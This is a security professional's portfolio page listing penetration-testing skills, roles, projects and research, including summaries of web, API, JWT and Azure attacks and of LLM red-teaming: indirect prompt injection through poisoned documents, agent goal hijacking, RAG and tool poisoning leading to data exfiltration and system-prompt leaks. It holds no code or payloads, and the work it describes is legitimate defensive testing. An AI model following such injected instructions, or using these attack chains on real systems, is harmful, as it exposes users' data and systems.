Karthikeyan V

01. About Me

Offensive Security
Practitioner

I'm Karthikeyan V, a Senior Security Analyst at Accenture with 4+ years of hands-on experience in offensive security. I specialise in finding exploitable vulnerabilities in web applications, APIs, and cloud infrastructure — before adversaries do.

Currently, I lead penetration testing engagements on Accenture's internal and cloud-hosted applications, including B2C platforms and Microsoft PowerApps. Every engagement follows the OWASP Web Security Testing Guide (WSTG) for web applications and OWASP API Security Top 10 for API assessments — ensuring comprehensive, methodology-driven coverage.

I've performed real-world vulnerability research on targets including demo.testfire.net and the Acunetix test environment, uncovering injection flaws, broken authentication, and misconfiguration chains with documented PoCs and CWE mappings.

My frontier research is in AI & LLM Security — investigating prompt injection, agentic AI attack surfaces, and RAG pipeline exploitation. As AI systems proliferate, securing them demands the same adversarial rigour we apply to traditional applications. Pursuing OSCP+, CISSP, and CCSP to deepen both offensive mastery and strategic security leadership.

Years Offensive Security

200+

Vulnerabilities Identified

50+

Pentest Engagements

Microsoft/Azure Certs

OWASP

WSTG + API Specialist

LLM Security Research

02. Skills & Arsenal

Technical Arsenal

Tools, techniques, and technologies across the full offensive security spectrum — from recon to exploitation.

🎯

Web Pentesting

Burp Suite ProOWASP ZAP OWASP WSTGSQLMap ffufdirsearch gobusternikto XSS HunterCSRF PoC

🔌

API Security

PostmanREST / GraphQL OWASP API Top 10JWT Analysis OAuth 2.0API Fuzzing mitmproxyBOLA / BFLA

☁️

Cloud Security

AzureAWS MS PowerAppsIAM Misconfig Storage ExposureScoutSuite ProwlerPacu

🤖

AI / LLM Security

Prompt InjectionJailbreaking LLM FuzzingOWASP LLM Top 10 Agentic AIRAG Poisoning Model Inversion

💻

Programming

PythonBash JavaScriptPoC Development Exploit ScriptingAutomation Tool Chaining

🔬

Recon & Infrastructure

NmapMetasploit WiresharkNessus QualysKali Linux ShodantheHarvester

03. Experience

Career Timeline

Offensive security engagements, vulnerability research, and pentest delivery across enterprise environments.

Senior Security Analyst

Accenture

Jan 2026 — Present

Leading penetration testing engagements on Accenture's internal and cloud-hosted applications, including customer-facing B2C platforms and Microsoft PowerApps deployments. All web application assessments follow the OWASP Web Security Testing Guide (WSTG) framework; API security testing follows the OWASP API Security Top 10.

Conducting AI/LLM penetration testing for clients integrating generative AI pipelines. Identifying critical vulnerabilities including IDOR chains, authentication bypass via JWT manipulation, SSRF-to-internal-access escalation, and cloud IAM privilege escalation paths. Delivering executive and technical pentest reports with CVSS scoring, CWE mapping, and actionable remediation roadmaps.

OWASP WSTGOWASP API Top 10 Web VAPTAPI Pentesting MS PowerAppsCloud Pentesting AI/LLM SecurityAzure

Security Analyst

Cognizant Technology Solutions (CTS)

Mar 2022 — Dec 2025

Conducted 50+ web application penetration tests across banking, e-commerce, and healthcare verticals. Delivered API security assessments using OWASP API Top 10 methodology — uncovering BOLA, mass assignment, and sensitive data exposure vulnerabilities. Performed vulnerability research on public test environments including demo.testfire.net and the Acunetix test environment, documenting injection flaws, broken authentication chains, and misconfiguration exploits with full PoC write-ups and CWE mapping.

Built custom Python exploits for PoC demonstration, authored detailed technical and executive security reports, and initiated internal research into LLM prompt injection as AI integrations entered client environments.

Web PentestingAPI Security Vulnerability AssessmentBurp Suite Python ExploitsLLM Research OWASP WSTG

04. Projects

Security Projects

Real-world penetration testing with CWE mapping, CVE references, and documented attack methodologies.

🕸️

Critical

Web Application VAPT — Acunetix Test Environment

Full-scope penetration test on the Acunetix vulnerable web application. Discovered reflected and stored XSS, SQL injection via multiple parameters, CSRF vulnerabilities, and insecure file upload leading to remote code execution.

Tools:Burp Suite Pro, SQLMap, ffuf, OWASP ZAP

CWE:CWE-79 · CWE-89 · CWE-352 · CWE-434

Method:OWASP WSTG — Full Coverage

Impact:RCE · Session Hijacking · Data Exfiltration

🏦

Critical

Banking App VAPT — demo.testfire.net

Penetration test of a banking web application simulation. Identified SQL injection in login and search parameters, broken authentication allowing account takeover, and sensitive data exposure in HTTP responses and client-side code.

Tools:Burp Suite, SQLMap, dirsearch, Postman

CWE:CWE-89 · CWE-287 · CWE-200 · CWE-311

CVE Ref:OWASP A01:2021 · A02:2021 · A03:2021

Impact:Account Takeover · PII Exposure · Auth Bypass

🔌

Critical

REST API Security Assessment

Comprehensive API security review following OWASP API Top 10. Found BOLA enabling lateral data access across user accounts, broken function-level authorization exposing admin endpoints, and mass assignment allowing privilege escalation via API body parameter injection.

Tools:Postman, Burp Suite, mitmproxy, jwt_tool

CWE:CWE-285 · CWE-915 · CWE-269 · CWE-862

Method:OWASP API Security Top 10

Impact:Unauthorised Access · Privilege Escalation

🔑

High

JWT Security Analysis & Exploitation

Deep-dive research into JWT implementation flaws. Demonstrated algorithm confusion attack (RS256→HS256), none algorithm acceptance bypass, and weak secret brute-forcing with Hashcat — achieving admin token forgery with full account takeover PoC.

Tools:jwt_tool, Hashcat, Burp Suite, Python

CWE:CWE-347 · CWE-327 · CWE-798

CVE Ref:CVE-2022-21449 (Psychic Signatures)

Impact:Auth Bypass · Admin Token Forgery

☁️

Critical

Azure Cloud Misconfiguration Assessment

Azure security review identifying overly permissive IAM roles, publicly exposed storage blobs containing credentials, disabled MFA on privileged accounts, and misconfigured MS PowerApps environments — enabling lateral movement to production subscriptions.

Tools:ScoutSuite, Prowler, Azure CLI, Pacu

CWE:CWE-732 · CWE-306 · CWE-284 · CWE-522

Method:CIS Azure Benchmark v2.0

Impact:Full Tenant Compromise · Credential Theft

🤖

Critical

LLM Prompt Injection & Agentic AI Security

Adversarial testing of LLM-integrated enterprise applications. Demonstrated indirect prompt injection via poisoned documents, context hijacking, goal hijacking in agentic AI workflows, and RAG pipeline poisoning — with tool-execution abuse leading to data exfiltration.

Tools:Garak, PromptBench, LangChain, Python

CWE:CWE-77 · CWE-20 · OWASP LLM01 · LLM08

Method:OWASP LLM Top 10 / Manual Red Team

Impact:Data Exfil · System Prompt Leak · Agent Hijack

05. Certifications

Credentials & Roadmap

Active Microsoft/Azure certifications and high-value offensive security credentials in progress.

🛡️

AZ-500

Microsoft Azure

Azure Security Engineer Associate — cloud security posture, identity & access, threat protection.

✓ Earned

🔒

SC-200

Microsoft Security

Security Operations Analyst Associate — Microsoft Sentinel, Defender XDR, threat hunting.

✓ Earned

🌐

SC-900

Microsoft Security

Security, Compliance & Identity Fundamentals — Microsoft security ecosystem foundations.

✓ Earned

⚔️

OSCP+

OffSec

Offensive Security Certified Professional+ — advanced exploitation, active directory, evasion.

⟳ In Progress

🏛️

CISSP

(ISC)²

Certified Information Systems Security Professional — strategic security management & architecture.

⟳ In Progress

☁️

CCSP

(ISC)²

Certified Cloud Security Professional — cloud architecture, data security, platform security.

⟳ In Progress

06. Research

Security Research

Independent research at the intersection of AI security, offensive techniques, and emerging attack surfaces.

RESEARCH · 01

Prompt Injection in Enterprise LLM Applications

Systematic study of direct and indirect prompt injection vulnerabilities in enterprise LLM deployments. Analysis of attack vectors through user-controlled content, external data sources, and multi-modal inputs. Developed a threat taxonomy mapping injection types to business impact categories aligned with OWASP LLM Top 10.

GPT-4oClaudeGemini OWASP LLM01PythonGarak

RESEARCH · 02

Agentic AI Attack Surface Analysis

Exploration of security risks in autonomous AI agents with access to tools, memory, and external APIs. Research demonstrates tool-poisoning attacks, memory injection via RAG pipelines, and multi-agent trust boundary exploitation — with working PoC for cascading agent compromise via indirect prompt injection.

LangChainAutoGenCrewAI RAGTool PoisoningOWASP LLM08

RESEARCH · 03

API Attack Chaining: IDOR to Internal RCE

Research on chaining low-severity API vulnerabilities to achieve high-impact outcomes following OWASP API Security Top 10. Documents attack paths from IDOR → BOLA → credential exposure → SSRF → internal service RCE, with detection strategies and API gateway hardening recommendations for each chain link.

REST APIsGraphQL SSRFBOLA Burp SuiteOWASP API Top 10

RESEARCH · 04

Azure IAM Privilege Escalation Playbook

Comprehensive research mapping 30+ privilege escalation paths in Azure environments from overly permissive IAM policies. Covers managed identity exploitation, PassRole abuse, cross-subscription role chaining, and PowerApps environment misconfigurations — with Bicep/Terraform remediation templates for each finding.

AzureMS PowerApps IAMManaged Identity ScoutSuitePacu

Offensive SecurityPractitioner

Get In Touch

Offensive Security
Practitioner